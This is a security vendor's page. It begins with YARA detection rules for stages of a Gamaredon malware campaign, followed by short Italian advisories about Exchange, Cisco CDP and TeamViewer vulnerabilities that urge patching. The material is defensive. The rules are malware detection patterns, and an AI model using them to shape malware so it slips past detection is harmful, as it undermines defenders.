   	 11 of ($a*)
}
rule Gamaredon_Campaign_Genuary_2020_SFX_Stage_1 {
	meta:
  	description = "Yara Rule for Gamaredon SFX stage 1"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4D 5A }
	 $a2 = { FF 75 FC E8 F2 22 01 00 }
	 $a3 = { FE DE DB DB FE D5 D5 D6 F8 }
	 $a4 = { 22 C6 24 A8 BE 81 DE 63 }
	 $a5 = { CF 4F D0 C3 C0 91 B0 0D }

    condition:
   	 all of them
}
rule Gamaredon_Campaign_Genuary_2020_SFX_Stage_2 {
	meta:
  	description = "Yara Rule for Gamaredon SFX stage 2"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4D 5A }
	 $a2 = { 00 E9 07 D4 FD FF 8B 4D F0 81 }
	 $a3 = { B7 AB FE B2 B1 B5 FA 9B 11 80 }
	 $a4 = { 81 21 25 E0 38 03 FA F0 AF 11 }
	 $a5 = { 0A 39 DF F7 40 8D 7B 44 52 }

    condition:
   	 all of them
}
rule Gamaredon_Campaign_Genuary_2020_dot_NET_stage {
	meta:
  	description = "Yara Rule for Gamaredon dot NET stage"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4D 5A }
	 $a2 = "AssemblyCompanyAttribute"
	 $a3 = "GetDrives"
	 $a4 = "Aversome"
	 $a5 = "TotalMilliseconds"
	 $s1 = { 31 01 C6 01 F2 00 29 01 5C 03 76 }
	 $s2 = { 79 02 38 03 93 03 B5 03 }
	 $s3 = { 00 07 00 00 11 00 00 72 01 }
	 $s4 = { CD DF A6 EF 66 0E 44 D7 }

    condition:
   	 all of ($a*) and 2 of ($s*)
}

This blog post was authored by Davide Testa, Luigi Martire and Antonio Pirozzi of Cybaze-Yoroi ZLAB.

Gravi Vulnerabilità su Microsoft Exchange

Proto: N030220.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di gravi vulnerabilità all’interno di Exchange Server, nota soluzione di gestione posta elettronica di Microsoft estremamente diffusa sia in ambito Enterprise sia nella PMI. In particolare le vulnerabilità sono note con gli identificativi CVE-2020-0692 e CVE-2020-0688.

Le problematiche sono relative a due diverse funzionalità all’interno dei servizi di posta Exchange: 

Figura. Esposizione servizi di posta Exchange in Italia (Source:ShodanHQ) 

Le vulnerabilità sono state confermate dal Produttore all’interno degli Aggiornamenti di Sicurezza di Febbraio 2020, dove risultano afflitte le versioni:

Per via della natura dei servizi afflitti, della loro esposizione internet, e dell'imminente rilascio di dettagli tecnici annunciato dal programma ZDI, Yoroi consiglia caldamente di pianificare l’applicazione degli aggiornamenti software sui servizi di posta elettronica Microsoft Exchange in uso presso le Vostre infrastrutture.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Importanti Vulnerabilità su Molteplici Dispositivi Cisco

Proto: N020220 .

Con la presente Yoroi desidera informarLa riguardo alla scoperta di gravi vulnerabilità in molteplici tecnologie Cisco, comprendenti più famiglie di switch di rete, appliance di sicurezza, telefonia VoIP e dispositivi di videosorveglianza. Le criticità sono note con l’alias “CDPwn” e sono referenziate con gli identificativi CVE-2020-3119, CVE-2020-3118, CVE-2020-3111, CVE-2020-3110 e CVE-2020-3120.

Benché le problematiche impattino varie tipologie di dispositivi, la loro origine è comune e risiede in varie lacune nella gestione e nel processamento dei pacchetti Cisco Discovery Protocol (CDP), protocollo di rete di Livello-2 che i dispositivi Cisco sono in grado di gestire. Queste lacune possono essere sfruttate da attaccanti di rete in vari scenari, ad esempio nel caso di: 

Cisco ha confermato le problematiche con i bollettini  CISCO-SA-20200205-FXNXOS-IOSXR-CDP-DOS, CISCO-SA-20200205-NXOS-CDP-RCE, CISCO-SA-20200205-IOSXR-CDP-RCE, CISCO-SA-20200205-VOIP-PHONES-RCE-DOS e CISCO-SA-20200205-IPCAMERAS-RCE-DOS, dove ha rilasciato aggiornamenti firmware per le famiglie di prodotto:

Per via della potenziale criticità e diffusione dei dispositivi afflitti, e del rilascio di dettagli tecnici relativi alle vulnerabilità, Yoroi consiglia di pianificare l’applicazione degli aggiornamenti firmware resi disponibili dal Produttore.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Importante Vulnerabilità su TeamViewer

Proto: N010220.

Con la presente Yoroi desidera informarLa riguardo ad una vulnerabilità all’interno di TeamViewer, soluzione per l’amministrazione e l’accesso remoto diffusa in vari ambienti SMB ed Enterprise.  La criticità è nota con l’identificativo CVE-2019-18988.

Ricercatori indipendenti hanno scoperto una importante lacuna nel salvataggio delle credenziali utilizzate dal servizio di assistenza remota, le quali non risultano protette da Hashing. Un attaccante con accesso ad un PC con una delle versioni TeamViewer vulnerabili può ottenere privilegi amministrativi e recuperare le password utilizzate dal servizio di accesso remoto, potenzialmente utilizzabili per instaurare sessioni amministrative sugli ulteriori host di rete muniti di istanze TeamViewer. 

In base alle informazioni reperite, il Vendor risulta al corrente della situazione da più di 90 giorni, tuttavia non sono ancora stati rilasciati bollettini di sicurezza. I ricercatori hanno verificato la criticità per le versioni TeamViewer da 7 a 14, non è al momento confermato se la versione 15 risulti afflitta. 

Considerando la potenziale diffusione del software all’interno dei parchi macchine IT aziendali, la disponibilità di dettagli tecnici e strumenti di attacco, e l’esistenza di gruppi APT organizzati che sfruttano proprio credenziali TeamViewer per propagarsi all’interno delle reti (e.g. APT-41), Yoroi consiglia di monitorare il rilascio di aggiornamenti di sicurezza per TeamViewer e, nel mentre, di valutare la disabilitazione dell’avvio automatico dei servizi di accesso remoto (servizi “TeamViewer<VERSIONE>”) e di limitare li ri-utilizzo delle password TeamViewer.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index